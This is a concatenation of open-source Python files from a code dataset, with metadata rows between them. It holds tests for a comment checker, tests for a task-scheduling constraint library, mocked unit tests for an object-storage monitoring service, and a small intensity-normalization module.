        # check outdated single line comment (file modified line 3)
        self.assertNotEqual(output.find("possible outdated comment at test/test_infile.cc:1"), -1)
        # check that modified comments aren't included in output
        # (file modified at line 6 and line 7)
        self.assertEqual(output.find("possible outdated comment at test/test_infile.cc:6"), -1)
        # check that multiline comments are handled (file modified at line 12)
        self.assertNotEqual(output.find("possible outdated comment at test/test_infile.cc:9"), -1)


if __name__ == '__main__':
    unittest.main()
    os.remove("test_data/test_output.txt")


# --- tests/test_constraints.py (anthonydugois/dstf, MIT) ---
from dstf import *
def test_isvalid__no_simultaneous_execution():
task = Task("t0")
node = "n0"
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 10, {node: 10})))
ctr = NoSimultaneousExecutionConstraint()
assert ctr.isvalid(sched, Chunk(task, 20, {node: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 15, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 10, {node: 10}))
def test_isvalid__no_migration():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(3)]
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 0, {nodes[0]: 10})))
ctr = NoMigrationConstraint()
assert ctr.isvalid(sched, Chunk(task, 10, {nodes[0]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 10, {nodes[1]: 10}))
def test_isvalid__processing_times():
task = Task("t0")
node = "n0"
sched = Schedule()
sched.apply(AppendOperator(Chunk(task, 0, {node: 5})))
ctr = ProcessingTimesConstraint({node: 10})
assert ctr.isvalid(sched, Chunk(task, 5, {node: 5.000001}))
assert ctr.isvalid(sched, Chunk(task, 5, {node: 2}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 5.001}))
assert not ctr.isvalid(sched, Chunk(task, 5, {node: 6}))
def test_isvalid__release_time():
task = Task("t0")
node = "n0"
sched = Schedule()
ctr = ReleaseTimeConstraint(10)
assert ctr.isvalid(sched, Chunk(task, 10, {node: 10}))
assert ctr.isvalid(sched, Chunk(task, 11, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 9, {node: 10}))
def test_isvalid__deadline():
task = Task("t0")
node = "n0"
sched = Schedule()
ctr = DeadlineConstraint(10)
assert ctr.isvalid(sched, Chunk(task, 0, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 1, {node: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {node: 11}))
def test_isvalid__multipurpose_machines():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = MultipurposeMachinesConstraint(nodes[:3])
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[3]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[3]: 10}))
def test_isvalid__execution_size():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = ExecutionSizeConstraint(2)
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10}))
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[3]: 10, nodes[4]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
def test_isvalid__execution_nodes():
task = Task("t0")
nodes = ["n{}".format(i) for i in range(10)]
sched = Schedule()
ctr = ExecutionNodesConstraint(nodes[:3])
assert ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[2]: 10, nodes[3]: 10}))
assert not ctr.isvalid(sched, Chunk(task, 0, {nodes[0]: 10, nodes[1]: 10, nodes[3]: 10}))
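The release-time and deadline rules exercised by the tests above can be sketched standalone. `MiniChunk` and the two check functions below are illustrative stand-ins inferred from the assertions, not the dstf API.

```python
# Standalone sketch of the release-time and deadline checks the tests assert.
# MiniChunk, release_time_ok and deadline_ok are hypothetical names; the real
# dstf constraint classes wrap this logic in an isvalid(schedule, chunk) method.
from dataclasses import dataclass, field
from typing import Dict


@dataclass
class MiniChunk:
    start: float
    proctimes: Dict[str, float] = field(default_factory=dict)


def release_time_ok(chunk: MiniChunk, release: float) -> bool:
    # A chunk may not begin before the task's release time.
    return chunk.start >= release


def deadline_ok(chunk: MiniChunk, deadline: float) -> bool:
    # Every node must finish its share of the chunk by the deadline.
    return chunk.start + max(chunk.proctimes.values()) <= deadline


print(release_time_ok(MiniChunk(10, {"n0": 10}), 10))  # True
print(deadline_ok(MiniChunk(1, {"n0": 10}), 10))       # False
```

The six assertions in `test_isvalid__release_time` and `test_isvalid__deadline` hold under exactly these two inequalities.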
| 32.366972 | 107 | 0.63407 | 518 | 3,528 | 4.256757 | 0.1139 | 0.130612 | 0.197279 | 0.263039 | 0.814966 | 0.775057 | 0.757823 | 0.735601 | 0.61678 | 0.493878 | 0 | 0.069338 | 0.186508 | 3,528 | 108 | 108 | 32.666667 | 0.698955 | 0 | 0 | 0.39726 | 0 | 0 | 0.010204 | 0 | 0 | 0 | 0 | 0 | 0.39726 | 1 | 0.109589 | false | 0 | 0.013699 | 0 | 0.123288 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
498629b32fad75b1a1d8c62bcbb3cf7f40209d9c | 31,643 | py | Python | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | tests/plugins/test_objectstorage_summary_service.py | papodaca/opsconsole-server | 952e5765cd22bf7cf364d89bf5cce14440ddc575 | [
"Apache-2.0"
] | null | null | null | # (c) Copyright 2016-2017 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
from mock import patch
from bll import api
from bll.api.auth_token import TokenHelpers
from bll.api.request import BllRequest
from bll.plugins import objectstorage_summary_service
from monascaclient.v2_0.alarms import AlarmsManager
from monascaclient.v2_0.metrics import MetricsManager
from monascaclient.v2_0.alarm_definitions import AlarmDefinitionsManager
from tests.util import TestCase
MEASUREMENT_OUPUT = [{'dimensions':
{'service': 'ops-console',
'cluster': 'management',
'url': 'http://192.16.66.10:9095/version.json',
'hostname': 'mycloud-ccp-mgmt-m1-clm',
'component': 'ops-console-web',
'control_plane': 'ccp',
'mount': '/dev/mqueue',
'cloud_name': 'mycloud'
},
'measurements': [['2016-08-28T22:41:15.000Z', 12.0, {}],
['2016-08-28T23:41:15.000Z', 59.0, {}]
],
'id': '3a155502224c8e83b30ee13e2adfe9d89d78e602',
'columns': ['timestamp', 'value', 'value_meta'],
'name': 'test'}]
STATISTICS_OUTPUT = [{'dimensions':
{'service': 'object-storage',
'cluster': 'MyCluster',
'hostname': 'MyHostname',
'mount': '/dev/mqueue'
},
'name': 'Swiftlm.Test',
'statistics': [
['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T23:41:15.000Z', 2.0]]
}
]
SPECIAL_STATISTICS_OUTPUT = [{'dimensions':
{'service': 'object-storage',
'cluster': 'MyCluster',
'hostname': 'MyHostname',
'mount': '/dev/mqueue'
},
'name': 'Swiftlm.Test',
'statistics': [
['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T04:41:15.000Z', 2.0],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T15:41:15.000Z', 0.0],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T23:41:15.000Z', 2.0]]
}
]
ALARM_DEFINITION_SHOW_OUTPUT = {'description': 'Alarms',
'id': '38b3c2b7-efe6',
'name': 'Disk Usage',
'severity': 'LOW'
}
ALARM_LIST_OUTPUT = [{'state': 'OK',
'alarm_definition': {'severity': 'LOW',
'id': '38b3c2b7-efe6',
'name': 'Disk Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c713'},
{'state': 'ALARM',
'alarm_definition': {'severity': 'LOW',
'id': '38b3c2b7-efe7',
'name': 'Memory Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c714'},
{'state': 'ALARM',
'alarm_definition': {'severity': 'HIGH',
'id': '38b3c2b7-efe8',
'name': 'Latency Usage'},
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715'}
]
ALARM_SHOW_OUTPUT = {'state': "ALARM",
'alarm_definition': {'severity': 'HIGH',
'id': '38b3c2b7-efe8',
'name': 'Latency Usage'},
'status': 'CRITICAL',
'id': 'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715'
}
CALL_SERVICE_OUTPUT = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
ALARM_COUNT_OUTPUT = {"counts":
[[5, "OK", "LOW"],
[6, "ALARM", "CRITICAL"],
[2, "ALARM", "HIGH"],
[3, "ALARM", "LOW"],
[7, "UNDETERMINED", "MED"]]}
METRIC_LIST_OUTPUT = [{"id": "0000f6b224259cf215505608edf6f10d7a3a273d",
"name": "swiftlm.systems.check_mounts",
"dimensions": {"cluster": "MyCluster",
"hostname": "Myhostname",
"service": "object-storage",
"mount": "/dev/mqueue"}
}]
class Object_Storage_Data():
def data_without_cluster_card(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '1',
'period': '3600'}
def data_without_cluster_graph(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '5',
'period': '3600'}
def data_with_cluster_card(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '1',
'period': '3600',
'cluster': 'MyCluster',
'hostname': 'MyHostname'}
def data_with_cluster_graph(self):
return {'end_time': '2016-08-28T23:41:15Z',
'interval': '5',
'period': '3600',
'cluster': 'MyCluster',
'hostname': 'Myhostname'}
def data_only_node(self):
return {'cluster': 'MyCluster',
'hostname': 'Myhostname'}
class TestObjectStorageSummarySvc(TestCase):
def setUp(self):
self.inst = Object_Storage_Data()
def test_memory_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='memory',
data=data,
expected_output=expected_output)
def test_storage_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='storage',
data=data,
expected_output=expected_output)
def test_load_average_donut(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='load_average_donut',
data=data,
expected_output=expected_output)
def test_time_to_replicate_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='time_to_replicate',
data=data,
expected_output=expected_output)
def test_time_to_replicate_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='time_to_replicate',
data=data,
expected_output=expected_output)
def test_oldest_replication_completion_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(
operation='oldest_replication_completion',
data=data,
expected_output=expected_output)
def test_oldest_replication_completion_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(
operation='oldest_replication_completion',
data=data,
expected_output=expected_output)
def test_current_capacity_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='current_capacity',
data=data,
expected_output=expected_output)
def test_current_capacity_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test':
[['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]]}
self.common_handler(operation='current_capacity',
data=data,
expected_output=expected_output)
def test_filesystem_utilization_card(self):
data = self.inst.data_with_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='filesystem_utilization',
data=data,
expected_output=expected_output)
def test_latency_healthcheck_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='latency_healthcheck',
data=data,
expected_output=expected_output)
def test_latency_healthcheck_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='latency_healthcheck',
data=data,
expected_output=expected_output)
def test_latency_operational_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='latency_operational',
data=data,
expected_output=expected_output)
def test_latency_operational_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='latency_operational',
data=data,
expected_output=expected_output)
def test_async_pending_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='async_pending',
data=data,
expected_output=expected_output)
def test_async_pending_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='async_pending',
data=data,
expected_output=expected_output)
def test_alarms(self):
data = self.inst.data_without_cluster_card()
expected_output = {'counts': [[5, 'OK', 'LOW'],
[6, 'ALARM', 'CRITICAL'],
[2, 'ALARM', 'HIGH'],
[3, 'ALARM', 'LOW'],
[7, 'UNDETERMINED', 'MED']
]}
self.common_handler(operation='alarms',
data=data,
expected_output=expected_output)
def test_mount_status(self):
data = self.inst.data_with_cluster_card()
expected_output = {'total_mount_point': 1,
'mount_status': {'mounted': 0,
'unmounted': 1}}
self.common_handler(operation='mount_status',
data=data,
expected_output=expected_output)
def test_service_availability_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='service_availability',
data=data,
expected_output=expected_output)
def test_service_availability_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='service_availability',
data=data,
expected_output=expected_output)
def test_load_average_card(self):
data = self.inst.data_without_cluster_card()
expected_output = {'Swiftlm.Test': 2.0}
self.common_handler(operation='load_average',
data=data,
expected_output=expected_output)
    def test_load_average_graph(self):
data = self.inst.data_without_cluster_graph()
expected_output = {'Swiftlm.Test': [['2016-08-27T23:41:15.000Z', 26.9],
['2016-07-28T07:41:15.000Z', 0.0],
['2016-07-28T11:41:15.000Z', 34.5],
['2016-07-28T19:41:15.000Z', 34.5],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15.000Z', 2.0]
]}
self.common_handler(operation='load_average',
data=data,
expected_output=expected_output)
def test_file_systems(self):
data = self.inst.data_with_cluster_card()
expected_output = {'/dev/mqueue': {'Swiftlm.Test': 2.0}}
self.common_handler(operation='file_systems',
data=data,
expected_output=expected_output)
def test_rate_of_change_card(self):
data = self.inst.data_with_cluster_card()
expected_output = [-32.5]
self.common_handler(operation='rate_of_change',
data=data,
expected_output=expected_output)
def test_rate_of_change_graph(self):
data = self.inst.data_with_cluster_graph()
expected_output = [['2016-08-27T23:41:15.000Z', -26],
['2016-07-28T07:41:15.000Z', 34],
['2016-07-28T11:41:15.000Z', 0],
['2016-07-28T19:41:15.000Z', -32],
['2016-08-28T22:41:15Z', -1],
['2016-08-28T23:41:15Z', -1]]
self.common_handler(operation='rate_of_change',
data=data,
expected_output=expected_output)
def test_heat_map_cpu_load_average(self):
data = self.inst.data_without_cluster_card()
self.common_handler(operation='heat_map_cpu_load_average',
data=data,
expected_output=[])
def test_alarm_description(self):
data = self.inst.data_with_cluster_card()
expected_output = {'ff43aacc-a5db-4f6f-a5d3-44f9cce8c713':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'},
'ff43aacc-a5db-4f6f-a5d3-44f9cce8c715':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'},
'ff43aacc-a5db-4f6f-a5d3-44f9cce8c714':
{'status': 'CRITICAL',
'state': 'ALARM',
'description': 'Alarms',
'alarm_definition_id': '38b3c2b7-efe8',
'name': 'Latency Usage',
'severity': 'HIGH'}}
self.common_handler(operation='alarm_description', data=data,
expected_output=expected_output)
def test_heat_map_utilization_focused_inventory(self):
data = self.inst.data_without_cluster_card()
self.common_handler(
operation='heat_map_utilization_focused_inventory',
data=data, expected_output=[])
@patch.object(AlarmsManager, 'count')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def test_node_state(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_alarm_count):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
mock_alarm_count.return_value = {"counts":
[[5, "OK", "LOW"],
[6, "ALARM", "CRITICAL"],
[2, "ALARM", "HIGH"],
[3, "ALARM", "LOW"],
[7, "UNDETERMINED", "MED"]]}
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: "node_state",
api.DATA: None
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
@patch.object(AlarmsManager, 'count')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def test_health_focused(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_alarm_count):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = {'ccp:cluster1':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt'],
'ccp:cluster2':
['standard-ccp-c1-m1-mgmt',
'standard-ccp-c1-m2-mgmt',
'standard-ccp-c1-m3-mgmt']}
mock_alarm_count.return_value = {"counts": [[5, "OK", "LOW"],
[6, "OK", "HIGH"]]}
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: "health_focused",
api.DATA: None
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(AlarmsManager, 'list')
@patch.object(AlarmsManager, 'get')
@patch.object(AlarmDefinitionsManager, 'get')
@patch.object(AlarmsManager, 'count')
@patch.object(MetricsManager, 'list')
@patch.object(MetricsManager, 'list_statistics')
@patch.object(MetricsManager, 'list_measurements')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def common_handler(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_get_measurement_list,
mock_get_statistics_list,
mock_get_list,
mock_get_alarm_count,
mock_get_alarm_definition_get,
mock_get_alarm_get,
mock_get_alarm_list,
mock_call_service,
operation, data, expected_output):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_get_measurement_list.return_value = MEASUREMENT_OUPUT
mock_get_statistics_list.return_value = STATISTICS_OUTPUT
mock_get_list.return_value = METRIC_LIST_OUTPUT
mock_get_alarm_count.return_value = ALARM_COUNT_OUTPUT
mock_get_alarm_definition_get.return_value = \
ALARM_DEFINITION_SHOW_OUTPUT
mock_get_alarm_get.return_value = ALARM_SHOW_OUTPUT
mock_get_alarm_list.return_value = ALARM_LIST_OUTPUT
mock_call_service.return_value = CALL_SERVICE_OUTPUT
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: operation,
api.DATA: data
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
expected = expected_output
self.assertEqual(reply[api.DATA], expected)
def test_project_capacity_metric_card_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 1,
"period": 3600,
"id": "123"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_metric_card_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 1,
"period": 3600,
"id": "all"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_time_series_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "all"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_time_series_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "123"}
operation = "project_capacity"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_metric_card_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 2,
"period": 3600,
"id": "123"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_metric_card_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 2,
"period": 3600,
"id": "all"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_time_series_all_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "all"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_project_capacity_roc_time_series_selected_project(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 24,
"period": 3600,
"id": "123"}
operation = "project_capacity_roc"
self.project_common_handler(operation=operation, data=data)
def test_topten_project_capacity(self):
data = {"end_time": "2016-07-15T23:00:00Z",
"interval": 6,
"period": 3600}
operation = "topten_project_capacity"
self.project_common_handler(operation=operation, data=data)
@patch.object(MetricsManager, 'list_statistics')
@patch.object(objectstorage_summary_service.ObjectStorageSummarySvc,
'call_service')
@patch.object(TokenHelpers, 'get_service_endpoint')
@patch.object(TokenHelpers, 'get_token_for_project')
def project_common_handler(self, mock_get_token_for_project,
mock_get_service_endpoint,
mock_call_service,
mock_list_statistics,
operation, data):
mock_get_token_for_project.return_value = "admin"
mock_get_service_endpoint.return_value = "http://localhost:8070/v2.0"
mock_call_service.return_value = [
{"id": "34c037934d852ea7", "name": "backup"},
{"id": "2e3a733b4559c20f", "name": "demo"}
]
mock_list_statistics.return_value = [
{"dimensions": {"user_id": "None",
"cloud_name": "standard",
"region": "None",
"resource_id": "62d256ae5f1748dab8fedf8ebdf4b802",
"control_plane": "ccp",
"cluster": "cluster1",
"datasource": "ceilometer",
"project_id": "62d256ae5f1748dab8fedf8ebdf4b802",
"type": "gauge",
"unit": "B",
"source": "openstack"},
"statistics": [["2016-07-15T23:00:00.000Z", 300],
["2016-07-16T00:00:00.000Z", 450],
["2016-07-16T01:00:00.000Z", 250],
["2016-07-16T02:00:00.000Z", 500],
["2016-07-16T03:00:00.000Z", 600]
]
}]
request = {
api.TARGET: 'objectstorage_summary_service',
api.ACTION: 'GET',
api.AUTH_TOKEN: 'unused',
api.DATA: {
api.OPERATION: operation,
api.DATA: data,
}
}
svc = objectstorage_summary_service.ObjectStorageSummarySvc(
bll_request=BllRequest(request))
reply = svc.handle()
self.assertEqual(reply['status'], api.STATUS_INPROGRESS)
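The stacked `@patch.object` decorators on `common_handler` and `project_common_handler` hand their mocks to the method bottom-up: the decorator closest to the `def` fills the first mock parameter. A minimal stdlib-only demonstration (the patched targets here are arbitrary examples, not this project's code):

```python
# unittest.mock applies stacked @patch decorators bottom-up, so the innermost
# decorator supplies the first positional mock argument.
from unittest.mock import patch
import json
import os


@patch("os.getcwd")   # outermost decorator -> last mock argument
@patch("json.dumps")  # innermost decorator -> first mock argument
def demo(mock_dumps, mock_getcwd):
    mock_dumps.return_value = "from-json"
    mock_getcwd.return_value = "from-os"
    return json.dumps({}), os.getcwd()


print(demo())  # ('from-json', 'from-os')
```

This is why the parameter list of `common_handler` reads in the reverse order of its decorator stack.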
| 47.087798 | 79 | 0.482634 | 2,918 | 31,643 | 4.988005 | 0.089445 | 0.078873 | 0.031879 | 0.03078 | 0.814428 | 0.791549 | 0.764754 | 0.753006 | 0.738784 | 0.738509 | 0 | 0.108528 | 0.403344 | 31,643 | 671 | 80 | 47.157973 | 0.662394 | 0.002939 | 0 | 0.651888 | 0 | 0 | 0.205725 | 0.086823 | 0 | 0 | 0 | 0 | 0.006568 | 1 | 0.077176 | false | 0 | 0.014778 | 0.00821 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4995a348fa06dc9c2cf2d62fef99d47af3de03bb | 212 | py | Python | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | mlreflect/xrrloader/footprint/normalization.py | schreiber-lab/mlreflect | 88a80ccac48461cc8934a46041726b70e469c6b8 | [
"MIT"
] | null | null | null | import numpy as np
from numpy import ndarray
def normalize_to_max(intensity: ndarray):
return intensity / np.max(intensity)
def normalize_to_first(intensity: ndarray):
return intensity / intensity[0]
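The two normalizations above can be restated in plain Python to make the intended behavior concrete (the module itself operates elementwise on numpy arrays; this list version is only an illustration):

```python
# Plain-list restatement of normalize_to_max / normalize_to_first: scale a
# curve so its peak (or its first sample) becomes 1.0.
def normalize_to_max(intensity):
    peak = max(intensity)
    return [v / peak for v in intensity]


def normalize_to_first(intensity):
    first = intensity[0]
    return [v / first for v in intensity]


curve = [2.0, 4.0, 1.0]
print(normalize_to_max(curve))    # [0.5, 1.0, 0.25]
print(normalize_to_first(curve))  # [1.0, 2.0, 0.5]
```

With numpy inputs, the division broadcasts over the whole array, so the module's one-line versions behave identically.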
